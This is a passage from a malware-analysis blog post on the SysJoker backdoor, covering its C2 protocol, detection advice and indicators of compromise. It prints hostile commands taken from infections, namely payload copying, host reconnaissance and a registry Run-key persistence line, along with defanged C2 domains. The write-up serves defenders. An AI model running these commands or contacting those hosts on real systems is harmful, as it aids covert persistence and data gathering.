&lt;p&gt;The following screenshot shows the processes tree and commands.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig4.png" title="Processes tree and commands." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Processes tree and commands.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next, SysJoker will begin its C2 communication.&lt;/p&gt;
&lt;h3&gt;Decoding/Encoding Scheme&lt;span class="hx:absolute hx:-mt-20" id="decodingencoding-scheme"&gt;&lt;/span&gt;
&lt;a href="#decodingencoding-scheme" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;SysJoker holds within the binary a hardcoded XOR key which is used for decoding
and encoding strings from within the binary and data sent and received from the
C2. The XOR key is an RSA public key that is not used in the decoding scheme.
The same XOR key exists in all versions of SysJoker:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDkfNl&amp;#43;Se7jm7sGSrSSUpV3HUl3vEwuh&amp;#43;xn4q
BY6aRFL91x0HIgcH2AM2rOlLdoV8v1vtG1oPt9QpC1jSxShnFw8evGrYnqaou7gLsY5J2B06eq5UW7
&amp;#43;OXgb77WNbU90vyUbZAucfzy0eF1HqtBNbkXiQ6SSbquuvFPUepqUEjUSQIDAQAB&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Resolving C2&lt;span class="hx:absolute hx:-mt-20" id="resolving-c2"&gt;&lt;/span&gt;
&lt;a href="#resolving-c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;To get an available C2 and start communication, SysJoker first decodes a
hardcoded Google Drive link.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig6.png" title="Decoding with CyberChef." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decoding with CyberChef.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The Google Drive link hosts a text file named domain.txt that holds an encoded
C2. The text file&amp;rsquo;s content changes over time, depending on the current
available C2. SysJoker will decode the C2 and send the collected user&amp;rsquo;s
information to the C2&amp;rsquo;s &lt;code&gt;/api/attach&lt;/code&gt; directory as an initial handshake. The C2
replies with a unique token which will be used as an identifier from now on
when the malware communicates with the C2.&lt;/p&gt;
&lt;h3&gt;C2 Instructions&lt;span class="hx:absolute hx:-mt-20" id="c2-instructions"&gt;&lt;/span&gt;
&lt;a href="#c2-instructions" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;SysJoker runs a while(1) loop that sends a request to the C2&amp;rsquo;s /api/req
directory with the unique token and will process the C2&amp;rsquo;s response which is
built as JSON using functions from this library. This is how SysJoker pings the
C2 for instructions (see step 2 in the image below):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;If the server responds with data, SysJoker will parse the received payload (see
step 3 in the image below). SysJoker can receive the following instruction from
the C2: exe, cmd, remove_reg, and exit.&lt;/p&gt;
&lt;p&gt;The following image shows the flow of SysJoker&amp;rsquo;s communication with the C2.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig8.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;remove_reg&lt;/code&gt; and &lt;code&gt;exit&lt;/code&gt; are not implemented in this current version. Based on
the instruction names, we can assume that they are in charge of self-deletion
of the malware. Let&amp;rsquo;s look into exe and cmd instructions:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;exe&lt;/code&gt; – This command is in charge of dropping and running an executable.
SysJoker will receive a URL to a zip file, a directory for the path the file
should be dropped to, and a filename that the malware should use on the
extracted executable. It will download this file, unzip it and execute it.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig9.png" title="IDA code snippet of the parsing function, if exe part." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IDA code snippet of the parsing function, if exe part.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;After execution, the malware will reply to the C2&amp;rsquo;s &lt;code&gt;/api/req/res&lt;/code&gt; API with
either &amp;ldquo;success&amp;rdquo; if the process went successful or &amp;ldquo;exception&amp;rdquo; if not (step 4
in the image above).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig10.png" title="IDA code snippet of the parsing function, building response status." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IDA code snippet of the parsing function, building response status.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;cmd&lt;/code&gt; – This instruction is in charge of running a command and uploading its
response to the C2. SysJoker will decode the command, execute it and upload the
command&amp;rsquo;s response to the C2 via &lt;code&gt;/api/req/res&lt;/code&gt; API (step 4 in the image
above).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig11.png" title="IDA code snippet of the parsing function, building cmd command response." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IDA code snippet of the parsing function, building cmd command response.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;During our analysis, the C2 hasn&amp;rsquo;t responded with a next stage instruction.&lt;/p&gt;
&lt;h2&gt;Detection &amp;amp; Response&lt;span class="hx:absolute hx:-mt-20" id="detection--response"&gt;&lt;/span&gt;
&lt;a href="#detection--response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;To detect if a machine in your organization has been compromised, we recommend
taking the following steps:&lt;/p&gt;
&lt;p&gt;Use memory scanners to detect SysJoker payload in memory.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For Linux machines, use Intezer Protect to gain full runtime visibility over
the code in your Linux-based systems and get alerted on any malicious or
unauthorized code. We have a free community edition.&lt;/li&gt;
&lt;li&gt;For Windows machines, use Intezer&amp;rsquo;s Endpoint Scanner. The Endpoint Scanner
will provide you with visibility into the type and origin of all binary code
that resides in your machine&amp;rsquo;s memory. The figure below shows an example of
an endpoint infected with SysJoker:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use detection content to search in your EDR or SIEM. We provided you with IoCs
and a rich list of detection content for each operating system below. Use these
with your EDR to hunt for infected machines. We will publish a dedicated blog
soon discussing how to use detection content for detecting SysJoker.&lt;/p&gt;
&lt;p&gt;If you have been compromised, take the following steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Kill the processes related to SysJoker, delete the relevant persistence
mechanism, and all files related to SysJoker (see detection content section
below)&lt;/li&gt;
&lt;li&gt;Make sure that the infected machine is clean by running a memory scanner&lt;/li&gt;
&lt;li&gt;Investigate the initial entry point of the malware. If a server was infected
with SysJoker, in the course of this investigation, check:
&lt;ul&gt;
&lt;li&gt;Configuration status and password complexity for publicly facing services&lt;/li&gt;
&lt;li&gt;Used software versions and possible known exploits&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;SysJoker&amp;rsquo;s Linux and Windows versions are now indexed in Intezer Analyze.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/new-backdoor-sysjoker/images/fig12.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;Final Points&lt;span class="hx:absolute hx:-mt-20" id="final-points"&gt;&lt;/span&gt;
&lt;a href="#final-points" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;There are indications that SysJoker attack is performed by an advanced threat
actor:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The fact that the code was written from scratch and hasn&amp;rsquo;t been seen before
in other attacks. On top of that, it is rare to find previously unseen Linux
malware in a live attack.&lt;/li&gt;
&lt;li&gt;The attacker registered at least 4 different domains and wrote from scratch
the malware for three different operating systems.&lt;/li&gt;
&lt;li&gt;During our analysis, we haven&amp;rsquo;t witnessed a second stage or command sent from
the attacker. This suggests that the attack is specific which usually fits
for an advanced actor.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Based on the malware&amp;rsquo;s capabilities we assess that the goal of the attack is
espionage together with lateral movement which might also lead to a ransomware
attack as one of the next stages.&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Files&lt;span class="hx:absolute hx:-mt-20" id="files"&gt;&lt;/span&gt;
&lt;a href="#files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;ELF&lt;span class="hx:absolute hx:-mt-20" id="elf"&gt;&lt;/span&gt;
&lt;a href="#elf" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;bd0141e88a0d56b508bc52db4dab68a49b6027a486e4d9514ec0db006fe71eed
d028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Mac&lt;span class="hx:absolute hx:-mt-20" id="mac"&gt;&lt;/span&gt;
&lt;a href="#mac" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;1a9a5c797777f37463b44de2b49a7f95abca786db3977dcdac0f79da739c08ac
fe99db3268e058e1204aff679e0726dc77fd45d06757a5fda9eafc6a28cfb8df
d0febda3a3d2d68b0374c26784198dc4309dbe4a8978e44bb7584fd832c325f0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Windows&lt;span class="hx:absolute hx:-mt-20" id="windows"&gt;&lt;/span&gt;
&lt;a href="#windows" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;61df74731fbe1eafb2eb987f20e5226962eeceef010164e41ea6c4494a4010fc
1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
d476ca89674c987ca399a97f2d635fe30a6ba81c95f93e8320a5f979a0563517
36fed8ab1bf473714d6886b8dcfbcaa200a72997d50ea0225a90c28306b7670e&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;C2&lt;span class="hx:absolute hx:-mt-20" id="c2"&gt;&lt;/span&gt;
&lt;a href="#c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;https[://]bookitlab[.]tech
https[://]winaudio-tools[.]com
https[://]graphic-updater[.]com
https[://]github[.]url-mini[.]com
https[://]office360-update[.]com
https[://]drive[.]google[.]com/uc?export=download&amp;amp;id=1-NVty4YX0dPHdxkgMrbdCldQCpCaE-Hn
https[://]drive[.]google[.]com/uc?export=download&amp;amp;id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Detection Content&lt;span class="hx:absolute hx:-mt-20" id="detection-content"&gt;&lt;/span&gt;
&lt;a href="#detection-content" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Windows&lt;span class="hx:absolute hx:-mt-20" id="windows-1"&gt;&lt;/span&gt;
&lt;a href="#windows-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Files and directories created on the machine&lt;span class="hx:absolute hx:-mt-20" id="files-and-directories-created-on-the-machine"&gt;&lt;/span&gt;
&lt;a href="#files-and-directories-created-on-the-machine" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;C:\ProgramData\RecoverySystem
C:\ProgramData\RecoverySystem\recoveryWindows.zip
C:\ProgramData\RecoverySystem\msg.exe
C:\ProgramData\SystemData\
C:\ProgramData\SystemData\igfxCUIService.exe
C:\ProgramData\SystemData\tempo1.txt
C:\ProgramData\SystemData\tempo2.txt
C:\ProgramData\SystemData\tempi1.txt
C:\ProgramData\SystemData\tempi2.txt
C:\ProgramData\SystemData\temps1.txt
C:\ProgramData\SystemData\temps2.txt
C:\ProgramData\SystemData\tempu.txt
C:\ProgramData\SystemData\microsoft_Windows.dll
C:\ProgramData\xAE Operating System\ServiceHub.exe&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence"&gt;&lt;/span&gt;
&lt;a href="#persistence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Name: igfxCUIService
Type: REG_SZ
Data: &amp;#34;C:\ProgramData\SystemData\igfxCUIService.exe&amp;#34;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Commands&lt;span class="hx:absolute hx:-mt-20" id="commands"&gt;&lt;/span&gt;
&lt;a href="#commands" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-batch" data-lang="batch"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&amp;#34;&lt;/span&gt; copy &amp;#39;C:\Users\&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;USER&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;\AppData\Local\Temp\1ffd6559d21470c40dcf9236.exe&amp;#39; &amp;#39;C:\ProgramData\SystemData\igfxCUIService.exe&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&amp;#34;&lt;/span&gt; getmac &lt;span class="p"&gt;|&lt;/span&gt; Out-File -Encoding &amp;#39;Default&amp;#39; &amp;#39;C:\ProgramData\SystemData\temps1.txt&amp;#39; ; wmic path win32_physicalmedia get SerialNumber &lt;span class="p"&gt;|&lt;/span&gt; Out-File -Encoding &amp;#39;Default&amp;#39; &amp;#39;C:\ProgramData\SystemData\temps2.txt&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\Wbem\WMIC.exe&amp;#34;&lt;/span&gt; path win32_physicalmedia get SerialNumber
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\system32\getmac.exe&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&amp;#34;&lt;/span&gt; $env:username &lt;span class="p"&gt;|&lt;/span&gt; Out-File -Encoding &amp;#39;Default&amp;#39; &amp;#39;C:\ProgramData\SystemData\tempu.txt&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempo1.txt&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="k"&gt;type&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempo1.txt&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempo2.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; /c wmic nicconfig where &amp;#39;IPEnabled = True&amp;#39; get ipaddress &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempi1.txt&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="k"&gt;type&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempi1.txt&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\tempi2.txt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmic nicconfig where &amp;#39;IPEnabled = True&amp;#39; get ipaddress
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;C:\Windows\System32\cmd.exe&amp;#34;&lt;/span&gt; /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\igfxCUIService.exe&amp;#34;&lt;/span&gt; /F
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\SystemData\igfxCUIService.exe&amp;#34;&lt;/span&gt; /F&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Linux&lt;span class="hx:absolute hx:-mt-20" id="linux"&gt;&lt;/span&gt;
&lt;a href="#linux" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Files and directories created on the machine&lt;span class="hx:absolute hx:-mt-20" id="files-and-directories-created-on-the-machine-1"&gt;&lt;/span&gt;
&lt;a href="#files-and-directories-created-on-the-machine-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;/.Library/
/.Library/SystemServices/updateSystem
/.Library/SystemNetwork
